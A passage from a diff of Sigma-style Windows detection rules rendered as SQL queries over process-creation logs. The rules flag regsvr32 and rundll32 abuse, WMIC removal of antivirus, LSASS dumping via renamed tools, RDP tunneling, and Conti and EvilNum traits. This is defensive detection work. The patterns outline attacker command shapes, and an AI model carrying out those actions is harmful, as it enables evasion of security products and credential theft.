Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "status": "test", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "status": "experimental", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "status": "experimental", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1564.004" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\')) AND NOT ((NewProcessName = '') OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName IN ('-', '')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%.scr' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Administrative activity", + "Software installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { "title": "Suspicious Rundll32 Invoking Inline VBScript", @@ -11241,1218 +10891,1209 @@ "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "detects the usage of path traversal in 